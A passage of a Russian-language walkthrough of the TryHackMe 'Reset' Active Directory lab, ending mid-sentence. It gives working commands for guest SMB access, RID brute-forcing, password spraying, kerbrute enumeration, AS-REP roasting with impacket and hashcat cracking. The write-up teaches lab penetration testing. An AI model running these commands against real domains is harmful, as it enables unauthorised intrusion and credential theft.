{"id":481722,"date":"2026-05-30T19:26:38","date_gmt":"2026-05-30T19:26:38","guid":{"rendered":"https:\/\/savepearlharbor.com\/?p=481722"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=481722","title":{"rendered":"Reset \u2014 \u043f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u0435 \u0441\u043b\u043e\u0436\u043d\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u044b \u043e\u0442 Tryhackme"},"content":{"rendered":"<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/bae\/918\/b11\/bae918b110ed2f36a65b52656bda2954.png\" alt=\"reset\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/bae\/918\/b11\/bae918b110ed2f36a65b52656bda2954.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/bae\/918\/b11\/bae918b110ed2f36a65b52656bda2954.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>reset<\/figcaption><\/div>\n<\/figure>\n<h3>\u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435<\/h3>\n<p>\u0413\u043e\u0434\u043d\u0430\u044f \u043c\u0430\u0448\u0438\u043d\u0430 \u043d\u0430 \u0442\u0435\u043c\u0443 Windows AD, Kerberos. \u0412 \u043d\u0430\u0447\u0430\u043b\u0435 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0433\u043e\u0441\u0442\u0435\u0432\u043e\u0439 \u0448\u0430\u0440\u0435. \u041e\u0442\u0442\u0443\u0434\u0430 \u0434\u043e\u0441\u0442\u0430\u0435\u043c \u0444\u0430\u0439\u043b \u0441 \u043f\u0430\u0440\u043e\u043b\u0435\u043c, \u043d\u043e \u043d\u0435 \u0437\u043d\u0430\u0435\u043c \u043e\u0442 \u043a\u0430\u043a\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438. \u041f\u0440\u043e\u0432\u043e\u0434\u0438\u043c \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u044e\u0437\u0435\u0440\u043e\u0432, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0441\u043f\u0438\u0441\u043e\u043a \u0438 \u043d\u0430\u0445\u043e\u0434\u0438\u043c 1 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043a \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u044d\u0442\u043e\u0442 \u043f\u0430\u0440\u043e\u043b\u044c. \u0414\u0430\u043b\u0435\u0435 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043c \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e BloodHound \u0438 \u043f\u043e \u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u043c \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430\u043c \u0443 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u0435\u0441\u0442\u044c \u043f\u0440\u0430\u0432\u0430 Unconstrained Delegation Privilege \u043d\u0430 \u0434\u043e\u043c\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 S4U2self, \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u043c \u0431\u0438\u043b\u0435\u0442 \u043d\u0430 \u0438\u043c\u044f \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0435\u043c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440.<\/p>\n<hr\/>\n<h3>\u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430 (T1595.002)<\/h3>\n<p>\u041f\u0435\u0440\u0432\u0438\u0447\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0446\u0435\u043b\u0438, \u0441\u0431\u043e\u0440 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.<\/p>\n<pre><code class=\"bash\">PORT     STATE SERVICE       VERSION53\/tcp   open  domain        Simple DNS Plus88\/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-05-19 12:08:47Z)135\/tcp  open  msrpc         Microsoft Windows RPC139\/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn389\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)445\/tcp  open  microsoft-ds?464\/tcp  open  kpasswd5?593\/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0636\/tcp  open  tcpwrapped3268\/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp, Site: Default-First-Site-Name)3269\/tcp open  tcpwrapped3389\/tcp open  ms-wbt-server Microsoft Terminal Services<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:87px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0417\u0434\u0435\u0441\u044c \u0443 \u043d\u0430\u0441 \u043f\u043e\u0440\u0442\u044b, \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u044b\u0435 \u0434\u043b\u044f Active Directory. \u041f\u043e\u043b\u043d\u044b\u0439 \u043d\u0430\u0431\u043e\u0440 \u043e\u0442 smb \u0434\u043e rdp. \u0422\u0430\u043a\u0436\u0435 \u0432\u0438\u0434\u0438\u043c \u0434\u043e\u043c\u0435\u043d, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u0432 \/etc\/hosts.<\/p>\n<hr\/>\n<h3>\u041f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u0438\u0435<\/h3>\n<p>\u041d\u0430\u0447\u043d\u0435\u043c \u0441 smb \u0448\u0430\u0440, \u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0443\u0437\u043d\u0430\u0442\u044c \u0431\u0430\u0437\u043e\u0432\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d\u043e \u043d\u0430\u043c, \u0445\u043e\u0442\u044c \u0447\u0442\u043e-\u0442\u043e \u0441 \u0433\u043e\u0441\u0442\u0435\u0432\u044b\u043c \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u043e\u043c.<\/p>\n<pre><code class=\"bash\">nxc smb 10.114.158.248  -u 'guest' -p '' SMB         10.114.158.248  445    HAYSTACK         [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:HAYSTACK) (domain:thm.corp) (signing:True) (SMBv1:None) (Null Auth:True)SMB         10.114.158.248  445    HAYSTACK         [+] thm.corp\\guest: <\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0413\u043e\u0441\u0442\u044f \u0432 \u044d\u0442\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u044e\u0442 \u0437\u0430 \u0441\u0432\u043e\u0435\u0433\u043e, \u043f\u043e\u044d\u0442\u043e\u043c \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043c \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u0448\u0430\u0440 \u0438 \u044e\u0437\u0435\u0440\u043e\u0432.<\/p>\n<p>\u0421\u043f\u0438\u0441\u043e\u043a \u044e\u0437\u0435\u0440\u043e\u0432 \u043d\u0430 \u0434\u0430\u043d\u043d\u043e\u043c \u044d\u0442\u0430\u043f\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c, \u043e\u0434\u043d\u0430\u043a\u043e \u0441\u043f\u0438\u0441\u043e\u043a \u0448\u0430\u0440 \u0435\u0441\u0442\u044c.<\/p>\n<pre><code class=\"bash\"> ~  nxc smb 10.114.158.248  -u 'guest' -p '' --shares --users                                SMB         10.114.158.248  445    HAYSTACK         [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:HAYSTACK) (domain:thm.corp) (signing:True) (SMBv1:None) (Null Auth:True)SMB         10.114.158.248  445    HAYSTACK         [+] thm.corp\\guest: SMB         10.114.158.248  445    HAYSTACK         [*] Enumerated sharesSMB         10.114.158.248  445    HAYSTACK         Share           Permissions     RemarkSMB         10.114.158.248  445    HAYSTACK         -----           -----------     ------SMB         10.114.158.248  445    HAYSTACK         ADMIN$                          Remote AdminSMB         10.114.158.248  445    HAYSTACK         C$                              Default shareSMB         10.114.158.248  445    HAYSTACK         Data            READ,WRITE      SMB         10.114.158.248  445    HAYSTACK         IPC$            READ            Remote IPCSMB         10.114.158.248  445    HAYSTACK         NETLOGON                        Logon server share SMB         10.114.158.248  445    HAYSTACK         SYSVOL                          Logon server share <\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0428\u0430\u0440\u0430 Data \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e. \u0417\u0430\u0445\u043e\u0434\u0438\u043c \u043f\u043e \u0434\u043e\u043c\u0435\u043d\u0443 \u0431\u0435\u0437 \u043f\u0430\u0440\u043e\u043b\u044f.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/6e8\/73c\/cc3\/6e873ccc367d556abf4175c87583feb3.png\" alt=\"Data smb\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/6e8\/73c\/cc3\/6e873ccc367d556abf4175c87583feb3.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/6e8\/73c\/cc3\/6e873ccc367d556abf4175c87583feb3.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>Data smb<\/figcaption><\/div>\n<\/figure>\n<p>\u0412\u0438\u0434\u0438\u043c 3 \u0444\u0430\u0439\u043b\u0430, \u043f\u0440\u0438\u0447\u0435\u043c \u0447\u0435\u0440\u0435\u0437 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u043e\u043d\u0438 \u043c\u0435\u043d\u044f\u044e\u0442 \u0441\u0432\u043e\u0438 \u0438\u043c\u0435\u043d\u0430. \u041d\u0438\u043a\u043e\u0433\u0434\u0430 \u0440\u0430\u043d\u0435\u0435 \u0442\u0430\u043a\u043e\u0433\u043e \u043d\u0435 \u0432\u0438\u0434\u0435\u043b, \u043d\u043e \u0434\u0430 \u043b\u0430\u0434\u043d\u043e. \u042f \u0440\u0435\u0448\u0438\u043b \u0441\u043a\u0430\u0447\u0430\u0442\u044c txt \u0444\u0430\u0439\u043b, \u043e\u043d \u0432\u0435\u0441\u0438\u0442, \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043d\u0438\u0447\u0435\u0433\u043e.<\/p>\n<pre><code>get g1di0c4x.tb5.txtgetting file \\onboarding\\g1di0c4x.tb5.txt of size 521 as g1di0c4x.tb5.txt (1.3 KiloBytes\/sec) (average 1.3 KiloBytes\/sec)<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0415\u0433\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0432\u043e\u0442 \u0442\u0430\u043a:<\/p>\n<pre><code>Subject: Welcome to Reset -\u00a0Dear &lt;USER&gt;,Welcome aboard! We are thrilled to have you join our team. As discussed during the hiring process, we are sending you the necessary login information to access your company account. Please keep this information confidential and do not share it with anyone.The initial passowrd is: ********We are confident that you will contribute significantly to our continued success. We look forward to working with you and wish you the very best in your new role.Best regards,The Reset Team<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u041e\u0442\u043b\u0438\u0447\u043d\u043e, \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c, \u043e\u0434\u043d\u0430\u043a\u043e \u043e\u0442 \u043a\u0430\u043a\u043e\u0433\u043e \u043e\u043d \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0435\u0449\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u043e\u0438\u0442 \u0432\u044b\u044f\u0441\u043d\u0438\u0442\u044c.<\/p>\n<p>\u0412\u044b\u0448\u0435 \u044f \u043f\u0438\u0441\u0430\u043b, \u0447\u0442\u043e \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0434\u043e\u0441\u0442\u0430\u0442\u044c \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c. \u041e\u0434\u043d\u0430\u043a\u043e \u0435\u0441\u043b\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c nxc smb \u0441 \u0444\u043b\u0430\u0433\u043e\u043c &#8212;rid-brute, \u0442\u043e \u043f\u043e\u043b\u044c\u0437\u0430\u043a\u0438 \u043f\u0440\u0435\u043a\u0440\u0430\u0441\u043d\u043e \u0434\u0430\u043c\u043f\u044f\u0442\u0441\u044f. \u0412\u0441\u044e \u043f\u043e\u0440\u0442\u044f\u043d\u043a\u0443 \u043f\u043e\u0441\u0442\u0438\u0442\u044c \u043d\u0435 \u0431\u0443\u0434\u0443\u2026<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b2b\/aff\/7d7\/b2baff7d7e7b74343260f68f0d22761e.png\" alt=\"rid-brute\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/b2b\/aff\/7d7\/b2baff7d7e7b74343260f68f0d22761e.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b2b\/aff\/7d7\/b2baff7d7e7b74343260f68f0d22761e.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>rid-brute<\/figcaption><\/div>\n<\/figure>\n<h3>\u041f\u0435\u0440\u0432\u0430\u044f \u0430\u0442\u0430\u043a\u0430<\/h3>\n<p>\u041e\u0442\u043b\u0438\u0447\u043d\u043e, \u0442\u0435\u043f\u0435\u0440\u044c \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043e\u0434\u043d\u0430\u043a\u043e \u0432 \u0442\u0430\u043a\u043e\u043c \u0432\u0438\u0434\u0435, \u043d\u0435\u043b\u044c\u0437\u044f \u0437\u0430\u043a\u0438\u043d\u0443\u0442\u044c \u0432 netexec, \u0447\u0442\u043e\u0431\u044b \u043e\u043d \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043b \u043a \u043a\u0430\u043a\u043e\u043c\u0443 \u0438\u043c\u0435\u043d\u043d\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u043f\u0430\u0440\u043e\u043b\u044c.<\/p>\n<p>\u0412\u0435\u0441\u044c \u0432\u044b\u0432\u043e\u0434 &#8212;rid-brute \u044f \u0441\u043e\u0445\u043e\u0430\u043d\u0438\u043b \u0432 \u0444\u0430\u0439\u043b users.txt. \u0414\u0430\u043b\u0435\u0435 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0443\u0442\u0438\u043b\u0438\u0442\u044b awk \u0443\u0434\u0430\u043b\u0438\u043b \u0432\u0441\u0435 \u043b\u0438\u0448\u043d\u0438\u0435 \u0441\u0442\u043e\u043b\u0431\u0446\u044b, \u043f\u0440\u0435\u0444\u0438\u043a\u0441\u044b \u0438 \u043f\u0440\u043e\u0431\u0435\u043b\u044b.<\/p>\n<pre><code class=\"bash\">awk -F'\\\\\\\\| \\\\(' '\/SidTypeUser\/ {print $2}' user.txt &gt; users1.txt<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\/SidTypeUser\/ \u2014 \u0438\u0449\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u0442\u0435 \u0441\u0442\u0440\u043e\u043a\u0438, \u0433\u0434\u0435 \u0442\u0438\u043f\u043e\u043c \u043e\u0431\u044a\u0435\u043a\u0442\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c (\u0438\u0433\u043d\u043e\u0440\u0438\u0440\u0443\u0435\u0442 \u0433\u0440\u0443\u043f\u043f\u044b \u0438 \u0430\u043b\u0438\u0430\u0441\u044b).<\/p>\n<p>-F\u2019\\\\| \\(\u2019 \u2014 \u0433\u043e\u0432\u043e\u0440\u0438\u043c awk, \u0447\u0442\u043e \u0441\u0442\u0440\u043e\u043a\u0430 \u0434\u0435\u043b\u0438\u0442\u0441\u044f \u043b\u0438\u0431\u043e \u043f\u043e \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u043c\u0443 \u0441\u043b\u044d\u0448\u0443 \\ (\u0432 \u0434\u043e\u043c\u0435\u043d\u0435 THM), \u043b\u0438\u0431\u043e \u043f\u043e \u043a\u043e\u043c\u0431\u0438\u043d\u0430\u0446\u0438\u0438 \u201c\u043f\u0440\u043e\u0431\u0435\u043b + \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u044e\u0449\u0430\u044f \u0441\u043a\u043e\u0431\u043a\u0430\u201d  (.<\/p>\n<p>{print $2} \u2014 \u0432\u044b\u0432\u043e\u0434\u0438\u0442 \u0440\u043e\u0432\u043d\u043e \u0442\u043e, \u0447\u0442\u043e \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043c\u0435\u0436\u0434\u0443 \u043d\u0438\u043c\u0438 (\u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f).<\/p>\n<blockquote>\n<p>users1.txt \u2014 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0432 \u043d\u043e\u0432\u044b\u0439 \u0444\u0430\u0439\u043b.<\/p>\n<\/blockquote>\n<p>\u0412\u043e\u0442 \u0441 \u044d\u0442\u0438\u043c \u0444\u0430\u0439\u043b\u043e\u043c, \u0443\u0436\u0435 \u043c\u043e\u0436\u043d\u043e \u0448\u0442\u0443\u0440\u043c\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.<\/p>\n<pre><code> ~  nxc smb 10.114.158.248  -u 'users1.txt' -p '******!' ... SMB         10.114.158.248  445    HAYSTACK         [+] thm.corp\\LILY_ONEILL:****** (Guest)<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u042f \u043a\u043e\u043d\u0435\u0447\u043d\u043e \u0440\u0430\u0441\u0447\u0438\u0442\u044b\u0432\u0430\u043b, \u0447\u0442\u043e \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0431\u0443\u0434\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c, \u043e\u0434\u043d\u0430\u043a\u043e \u0434\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u0438 \u0442\u0430\u043a \u0441\u043e\u0439\u0434\u0435\u0442.<\/p>\n<p>\u041f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u043b \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u0441\u044f \u043f\u043e rdp, \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043b smb \u0448\u0430\u0440\u044b, \u043d\u043e \u043d\u0438\u0447\u0435\u0433\u043e \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0433\u043e \u043d\u0435 \u043d\u0430\u0448\u0435\u043b.<\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 \u044f \u0440\u0435\u0448\u0438\u043b \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c Kerberos. \u0412 impacket \u0435\u0441\u0442\u044c \u043c\u043e\u0434\u0443\u043b\u044c GetNPUsers, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0430\u0442\u0430\u043a\u0438 \u0442\u0438\u043f\u0430 AS-REP Roasting \u0432 Active Directory.<\/p>\n<p>\u041e\u043d \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c Kerberos AS-REP \u0445\u0435\u0448\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0443 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u043e\u043f\u0446\u0438\u044f \u201cDo not require Kerberos preauthentication\u201d.<\/p>\n<p>\u041f\u0435\u0440\u0435\u0434 \u044d\u0442\u0438\u043c \u043c\u043e\u0436\u043d\u043e \u0435\u0449\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c, \u0447\u0442\u043e \u0432\u0441\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0432\u0430\u043b\u0438\u0434\u043d\u044b\u0435.<\/p>\n<pre><code> ~  kerbrute userenum users1.txt \\  -d thm.corp \\  --dc 10.114.158.248<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0410 \u0434\u0430\u043b\u0435\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c impacket\u2026<\/p>\n<pre><code>~  impacket-GetNPUsers thm.corp\/ -no-pass \\  -usersfile \/tmp\/users1.txt \\  -dc-ip 10.114.158.248 \\  -format hashcat<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/fa7\/8b9\/e63\/fa78b9e636fd5922ae6bae43845742c8.png\" alt=\"impacket-getnpusers\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/fa7\/8b9\/e63\/fa78b9e636fd5922ae6bae43845742c8.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/fa7\/8b9\/e63\/fa78b9e636fd5922ae6bae43845742c8.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>impacket-getnpusers<\/figcaption><\/div>\n<\/figure>\n<p>\u0417\u0434\u0435\u0441\u044c 3 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043b\u044e\u0431\u0435\u0437\u043d\u043e \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0445\u044d\u0448\u0438. \u041b\u043e\u043c\u0430\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e 1 \u0438 \u044d\u0442\u043e TABATHA_BRITT.<\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 \u043b\u043e\u043c\u0430\u0435\u043c \u0447\u0435\u0440\u0435\u0437 hashcat, \u043e\u043d \u0443\u0436\u0435 \u0441\u0430\u043c \u0443\u043c\u0435\u0435\u0442 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0442\u044c \u0442\u0438\u043f \u0445\u044d\u0448\u0430.<\/p>\n<pre><code>hashcat ker.txt \/usr\/share\/wordlists\/rockyou.txt<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/58d\/f2f\/d3a\/58df2fd3a35328fd56add49197ec6961.png\" alt=\"hashcat\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/58d\/f2f\/d3a\/58df2fd3a35328fd56add49197ec6961.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/58d\/f2f\/d3a\/58df2fd3a35328fd56add49197ec6961.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>hashcat<\/figcaption><\/div>\n<\/figure>\n<h3>\u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430 \u0432 \u0434\u043e\u043c\u0435\u043d\u0435<\/h3>\n<p>\u042d\u0442\u043e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c, \u0443\u0436\u0435 \u0438\u043c\u0435\u0435\u0442 \u043f\u0440\u0430\u0432\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0431\u043b\u0430\u0433\u0430\u043c\u0438 \u0447\u0435\u043b\u043e\u0432\u0435\u0447\u0435\u0441\u0442\u0432\u0430 \u0438 rdp. \u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0441\u044f, \u043d\u043e \u0444\u043b\u0430\u0433\u0430 \u0437\u0434\u0435\u0441\u044c \u043d\u0435\u0442. \u041f\u043e\u0431\u0440\u043e\u0434\u0438\u0432 \u043f\u043e \u043f\u0430\u043f\u043a\u0430\u043c, \u043d\u0438\u0447\u0435\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0433\u043e \u043d\u0435 \u043d\u0430\u0448\u0435\u043b, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u043e\u0435\u0445\u0430\u043b\u0438 \u0441\u043e\u0431\u0438\u0440\u0430\u0442\u044c \u0438\u043d\u0444\u0443 \u0438 \u043e\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0442\u044c\u0441\u044f 